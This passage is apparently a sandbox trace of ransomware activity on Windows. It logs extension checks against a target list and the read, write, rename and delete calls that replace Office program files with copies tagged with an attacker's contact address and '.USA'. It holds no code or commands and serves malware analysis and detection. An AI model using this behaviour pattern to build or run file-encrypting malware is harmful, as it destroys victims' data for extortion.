Office\\Office14\\1033\\AEC.VSL") returned 55 [0272.312] lstrlenW (lpString=".zip") returned 4 [0272.335] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1 [0272.335] lstrlenW (lpString=".rar") returned 4 [0272.340] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1 [0272.340] lstrlenW (lpString=".bz2") returned 4 [0272.347] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1 [0272.347] lstrlenW (lpString=".7z") returned 3 [0272.347] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1 [0272.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL") returned 55 [0272.347] lstrlenW (lpString=".dbf") returned 4 [0272.347] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1 [0272.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL") returned 55 [0272.347] lstrlenW (lpString=".1cd") returned 4 [0272.347] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1 [0272.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL") returned 55 [0272.347] lstrlenW (lpString=".jpg") returned 4 [0272.347] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1 [0272.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL") returned 55 [0272.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL") returned 55 [0272.347] lstrlenW (lpString=".doc") returned 4 [0272.347] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1 [0272.347] lstrlenW (lpString=".docx") returned 5 [0272.347] lstrcmpiW (lpString1=".docx", lpString2="C.VSL") returned -1 [0272.348] lstrlenW (lpString=".pdf") returned 4 [0272.348] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1 [0272.348] lstrlenW (lpString=".xls") returned 4 [0272.348] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1 [0272.348] lstrlenW (lpString=".xlsx") returned 5 [0272.348] lstrcmpiW (lpString1=".xlsx", lpString2="C.VSL") returned -1 [0272.348] lstrlenW (lpString=".ppt") returned 4 [0272.348] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1 [0272.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL") returned 55 [0272.348] lstrlenW (lpString=".zip") returned 4 [0272.348] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1 [0272.348] lstrlenW (lpString=".rar") returned 4 [0272.348] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1 [0272.348] lstrlenW (lpString=".bz2") returned 4 [0272.348] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1 [0272.348] lstrlenW (lpString=".7z") returned 3 [0272.348] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1 [0272.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL") returned 55 [0272.348] lstrlenW (lpString=".dbf") returned 4 [0272.348] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1 [0272.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL") returned 55 [0272.348] lstrlenW (lpString=".1cd") returned 4 [0272.348] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1 [0272.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\AEC.VSL") returned 55 [0272.348] lstrlenW (lpString=".jpg") returned 4 [0272.348] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1 [0272.348] lstrcmpiW (lpString1=".VSL", lpString2=".USA") returned 1 [0272.349] lstrlenW (lpString="DWGCNV.VSL") returned 10 [0272.349] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGCNV.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dwgcnv.vsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0272.359] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=38752) returned 1 [0272.359] CloseHandle (hObject=0x394) returned 1 [0272.359] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGCNV.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dwgcnv.vsl")) returned 0x20 [0272.359] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGCNV.VSL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dwgcnv.vsl.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.359] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGCNV.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dwgcnv.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0272.359] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.360] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.360] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGCNV.VSL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dwgcnv.vsl.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0272.386] GetLastError () returned 0x0 [0272.386] ReadFile (in: hFile=0x394, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x9760, lpOverlapped=0x0) returned 1 [0272.423] WriteFile (in: hFile=0x3b4, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x9770, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0x9770, lpOverlapped=0x0) returned 1 [0272.424] ReadFile (in: hFile=0x394, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0272.424] WriteFile (in: hFile=0x3b4, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xe8, lpOverlapped=0x0) returned 1 [0272.424] SetEndOfFile (hFile=0x3b4) returned 1 [0272.424] CloseHandle (hObject=0x3b4) returned 1 [0272.424] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.424] SetEndOfFile (hFile=0x394) returned 1 [0272.426] CloseHandle (hObject=0x394) returned 1 [0272.426] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGCNV.VSL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.427] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGCNV.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dwgcnv.vsl")) returned 1 [0272.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGCNV.VSL") returned 58 [0272.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGCNV.VSL") returned 58 [0272.427] lstrlenW (lpString=".doc") returned 4 [0272.427] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1 [0272.427] lstrlenW (lpString=".docx") returned 5 [0272.427] lstrcmpiW (lpString1=".docx", lpString2="V.VSL") returned -1 [0272.427] lstrlenW (lpString=".pdf") returned 4 [0272.427] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1 [0272.427] lstrlenW (lpString=".xls") returned 4 [0272.427] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1 [0272.427] lstrlenW (lpString=".xlsx") returned 5 [0272.427] lstrcmpiW (lpString1=".xlsx", lpString2="V.VSL") returned -1 [0272.427] lstrlenW (lpString=".ppt") returned 4 [0272.427] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1 [0272.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGCNV.VSL") returned 58 [0272.427] lstrlenW (lpString=".zip") returned 4 [0272.427] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1 [0272.427] lstrlenW (lpString=".rar") returned 4 [0272.427] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1 [0272.427] lstrlenW (lpString=".bz2") returned 4 [0272.427] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1 [0272.427] lstrlenW (lpString=".7z") returned 3 [0272.427] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1 [0272.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGCNV.VSL") returned 58 [0272.428] lstrlenW (lpString=".dbf") returned 4 [0272.428] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1 [0272.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGCNV.VSL") returned 58 [0272.428] lstrlenW (lpString=".1cd") returned 4 [0272.428] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1 [0272.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGCNV.VSL") returned 58 [0272.428] lstrlenW (lpString=".jpg") returned 4 [0272.428] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1 [0272.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGCNV.VSL") returned 58 [0272.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGCNV.VSL") returned 58 [0272.428] lstrlenW (lpString=".doc") returned 4 [0272.428] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1 [0272.428] lstrlenW (lpString=".docx") returned 5 [0272.428] lstrcmpiW (lpString1=".docx", lpString2="V.VSL") returned -1 [0272.428] lstrlenW (lpString=".pdf") returned 4 [0272.428] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1 [0272.428] lstrlenW (lpString=".xls") returned 4 [0272.428] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1 [0272.428] lstrlenW (lpString=".xlsx") returned 5 [0272.428] lstrcmpiW (lpString1=".xlsx", lpString2="V.VSL") returned -1 [0272.428] lstrlenW (lpString=".ppt") returned 4 [0272.428] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1 [0272.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGCNV.VSL") returned 58 [0272.428] lstrlenW (lpString=".zip") returned 4 [0272.428] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1 [0272.428] lstrlenW (lpString=".rar") returned 4 [0272.428] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1 [0272.428] lstrlenW (lpString=".bz2") returned 4 [0272.428] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1 [0272.428] lstrlenW (lpString=".7z") returned 3 [0272.428] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1 [0272.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGCNV.VSL") returned 58 [0272.429] lstrlenW (lpString=".dbf") returned 4 [0272.429] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1 [0272.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGCNV.VSL") returned 58 [0272.429] lstrlenW (lpString=".1cd") returned 4 [0272.429] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1 [0272.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGCNV.VSL") returned 58 [0272.429] lstrlenW (lpString=".jpg") returned 4 [0272.429] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1 [0272.429] lstrcmpiW (lpString1=".IDX_DLL", lpString2=".USA") returned -1 [0272.429] lstrlenW (lpString="ENVELOPR.DLL.IDX_DLL") returned 20 [0272.429] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\envelopr.dll.idx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0272.436] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=13696) returned 1 [0272.436] CloseHandle (hObject=0x384) returned 1 [0272.436] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\envelopr.dll.idx_dll")) returned 0x20 [0272.436] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL.IDX_DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\envelopr.dll.idx_dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.436] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\envelopr.dll.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0272.436] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.436] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.436] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL.IDX_DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\envelopr.dll.idx_dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0272.438] GetLastError () returned 0x0 [0272.438] ReadFile (in: hFile=0x384, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x3580, lpOverlapped=0x0) returned 1 [0272.439] WriteFile (in: hFile=0x394, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x3590, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0x3590, lpOverlapped=0x0) returned 1 [0272.440] ReadFile (in: hFile=0x384, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0272.440] WriteFile (in: hFile=0x394, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xfc, lpOverlapped=0x0) returned 1 [0272.440] SetEndOfFile (hFile=0x394) returned 1 [0272.440] CloseHandle (hObject=0x394) returned 1 [0272.440] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.440] SetEndOfFile (hFile=0x384) returned 1 [0272.442] CloseHandle (hObject=0x384) returned 1 [0272.443] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL.IDX_DLL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.443] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\envelopr.dll.idx_dll")) returned 1 [0272.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL.IDX_DLL") returned 68 [0272.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL.IDX_DLL") returned 68 [0272.443] lstrlenW (lpString=".doc") returned 4 [0272.443] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1 [0272.443] lstrlenW (lpString=".docx") returned 5 [0272.443] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1 [0272.443] lstrlenW (lpString=".pdf") returned 4 [0272.443] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1 [0272.443] lstrlenW (lpString=".xls") returned 4 [0272.443] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1 [0272.443] lstrlenW (lpString=".xlsx") returned 5 [0272.443] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1 [0272.443] lstrlenW (lpString=".ppt") returned 4 [0272.443] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1 [0272.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL.IDX_DLL") returned 68 [0272.443] lstrlenW (lpString=".zip") returned 4 [0272.443] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1 [0272.443] lstrlenW (lpString=".rar") returned 4 [0272.444] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1 [0272.444] lstrlenW (lpString=".bz2") returned 4 [0272.444] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1 [0272.444] lstrlenW (lpString=".7z") returned 3 [0272.444] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0272.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL.IDX_DLL") returned 68 [0272.444] lstrlenW (lpString=".dbf") returned 4 [0272.444] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1 [0272.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL.IDX_DLL") returned 68 [0272.444] lstrlenW (lpString=".1cd") returned 4 [0272.444] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1 [0272.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL.IDX_DLL") returned 68 [0272.444] lstrlenW (lpString=".jpg") returned 4 [0272.444] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1 [0272.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL.IDX_DLL") returned 68 [0272.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL.IDX_DLL") returned 68 [0272.444] lstrlenW (lpString=".doc") returned 4 [0272.444] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1 [0272.444] lstrlenW (lpString=".docx") returned 5 [0272.444] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1 [0272.444] lstrlenW (lpString=".pdf") returned 4 [0272.444] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1 [0272.444] lstrlenW (lpString=".xls") returned 4 [0272.444] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1 [0272.444] lstrlenW (lpString=".xlsx") returned 5 [0272.444] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1 [0272.444] lstrlenW (lpString=".ppt") returned 4 [0272.444] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1 [0272.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL.IDX_DLL") returned 68 [0272.444] lstrlenW (lpString=".zip") returned 4 [0272.444] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1 [0272.445] lstrlenW (lpString=".rar") returned 4 [0272.445] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1 [0272.445] lstrlenW (lpString=".bz2") returned 4 [0272.445] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1 [0272.445] lstrlenW (lpString=".7z") returned 3 [0272.445] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0272.445] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL.IDX_DLL") returned 68 [0272.445] lstrlenW (lpString=".dbf") returned 4 [0272.445] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1 [0272.445] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL.IDX_DLL") returned 68 [0272.445] lstrlenW (lpString=".1cd") returned 4 [0272.445] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1 [0272.445] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL.IDX_DLL") returned 68 [0272.445] lstrlenW (lpString=".jpg") returned 4 [0272.445] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1 [0272.445] lstrcmpiW (lpString1=".VRD", lpString2=".USA") returned 1 [0272.445] lstrlenW (lpString="EQPLIST.VRD") returned 11 [0272.445] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\eqplist.vrd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0272.446] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=1699) returned 1 [0272.446] CloseHandle (hObject=0x384) returned 1 [0272.446] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\eqplist.vrd")) returned 0x20 [0272.446] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\eqplist.vrd.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.446] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\eqplist.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0272.447] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.447] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.447] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\eqplist.vrd.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0272.447] GetLastError () returned 0x0 [0272.447] ReadFile (in: hFile=0x384, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x6a3, lpOverlapped=0x0) returned 1 [0272.448] WriteFile (in: hFile=0x394, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x6b0, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0x6b0, lpOverlapped=0x0) returned 1 [0272.449] ReadFile (in: hFile=0x384, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0272.449] WriteFile (in: hFile=0x394, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xea, lpOverlapped=0x0) returned 1 [0272.449] SetEndOfFile (hFile=0x394) returned 1 [0272.449] CloseHandle (hObject=0x394) returned 1 [0272.449] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.449] SetEndOfFile (hFile=0x384) returned 1 [0272.451] CloseHandle (hObject=0x384) returned 1 [0272.451] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.451] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\eqplist.vrd")) returned 1 [0272.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD") returned 59 [0272.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD") returned 59 [0272.452] lstrlenW (lpString=".doc") returned 4 [0272.452] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1 [0272.452] lstrlenW (lpString=".docx") returned 5 [0272.452] lstrcmpiW (lpString1=".docx", lpString2="T.VRD") returned -1 [0272.452] lstrlenW (lpString=".pdf") returned 4 [0272.452] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1 [0272.452] lstrlenW (lpString=".xls") returned 4 [0272.452] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1 [0272.452] lstrlenW (lpString=".xlsx") returned 5 [0272.452] lstrcmpiW (lpString1=".xlsx", lpString2="T.VRD") returned -1 [0272.452] lstrlenW (lpString=".ppt") returned 4 [0272.452] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1 [0272.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD") returned 59 [0272.452] lstrlenW (lpString=".zip") returned 4 [0272.452] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1 [0272.452] lstrlenW (lpString=".rar") returned 4 [0272.452] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1 [0272.452] lstrlenW (lpString=".bz2") returned 4 [0272.452] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1 [0272.452] lstrlenW (lpString=".7z") returned 3 [0272.452] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1 [0272.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD") returned 59 [0272.452] lstrlenW (lpString=".dbf") returned 4 [0272.452] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1 [0272.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD") returned 59 [0272.452] lstrlenW (lpString=".1cd") returned 4 [0272.452] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1 [0272.452] lstrlenW (lpString="C:\\Program Files\\Microsoft 